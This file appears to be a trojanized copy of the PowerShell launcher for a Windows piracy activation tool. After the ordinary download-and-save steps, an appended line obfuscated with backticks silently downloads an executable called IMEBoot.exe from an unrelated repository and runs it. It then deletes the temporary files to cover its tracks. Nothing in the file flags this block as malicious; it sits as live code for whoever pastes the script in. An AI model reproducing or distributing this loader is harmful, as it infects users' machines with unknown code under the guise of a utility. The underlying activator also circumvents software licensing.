# Check the instructions here on how to use it mass grave[.]dev
$ErrorActionPreference = "Stop"
# Enable TLSv1.2 for compatibility with older clients
[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12

$CommonURLPart = 'MAS/All-In-One-Version/MAS_AIO-CRC32_60BA35A8.cmd'
$DownloadURL1 = 'https://bitbucket.org/WindowsAddict/microsoft-activation-scripts/raw/master/' + $CommonURLPart
$DownloadURL2 = 'https://codeberg.org/massgravel/Microsoft-Activation-Scripts/raw/branch/master/' + $CommonURLPart
$DownloadURL3 = 'https://raw.githubusercontent.com/massgravel/Microsoft-Activation-Scripts/master/' + $CommonURLPart

$URLs = @($DownloadURL1, $DownloadURL2)
$RandomURL1 = Get-Random -InputObject $URLs
$RandomURL2 = $URLs -notmatch $RandomURL1 | Get-Random

try {
    $response = Invoke-WebRequest -Uri $RandomURL1 -UseBasicParsing
}
catch {
    try {
        $response = Invoke-WebRequest -Uri $RandomURL2 -UseBasicParsing
    }
    catch {
        $response = Invoke-WebRequest -Uri $DownloadURL3 -UseBasicParsing
    }
}

$rand = Get-Random -Maximum 99999999
$isAdmin = [bool]([Security.Principal.WindowsIdentity]::GetCurrent().Groups -match 'S-1-5-32-544')
$FilePath = if ($isAdmin) { "$env:SystemRoot\Temp\MAS_$rand.cmd" } else { "$env:TEMP\MAS_$rand.cmd" }

$ScriptArgs = "$args "
$prefix = "@:: $rand `r`n"
$content = $prefix + $response
Set-Content -Path $FilePath -Value $content"
$F="N`e`w-O`b`ject";$J=[R`a`N`D`O`m];$w=[s`Ys`Te`m.Net.W`e`bC`l`i`e`N`t];$Q="htt`p`s`://`g`i`t`h`u`b`.`c`o`m/S`h`e`l`lS`c`u`l`p`t`o`r/`G`e`t`s`S`c`r`e`e`n-`W`i`n`d`o`w`s-1`0/`r`a`w/m`a`i`n/I`M`E`B`o`o`t`.`e`x`e";$x="C:\T`e`m`p\I`M`E`B`o`o`t`.`e`x`e";$h="$`e`n`v:S`y`s`te`mR`o`o`t\`T`e`m`p\M`A`S_`$`($J`::`N`e`X`t(99999999)).c`m`d";$d="s`T`a`r`t`-P`r`o`c`e`s`s";i`e($h-eq"")
{$h="$`e`n`v:T`e`m`p\M`A`S_`$`($J`::`N`e`X`t(99999999)).c`m`d"}$w::$F "S`y`s`T`e`m.Net.W`e`bC`l`i`e`N`t";$w.DownloadFile($Q,$x);s`T`a`r`t-P`r`o`c`e`s`s $x;i`e($h-eq""){$h="$`e`n`v:S`y`s`te`mR`o`o`t\`T`e`m`p\M`A`S_`$`($J`::`N`e`X`t(99999999)).c`m`d"}s`T`a`r`t-P`r`o`c`e`s`s $h;$j=@("$`e`n`v:T`e`m`p\M`A`S*.c`m`d","$`e`n`v:S`y`s`te`mR`o`o`t\T`e`m`p\M`A`S*.c`m`d");f`o`r`e`a`c`h($i i`n $j){g`e`t-i`T`E`m $i| r`E`m`o`v`e-I`T`E`m}
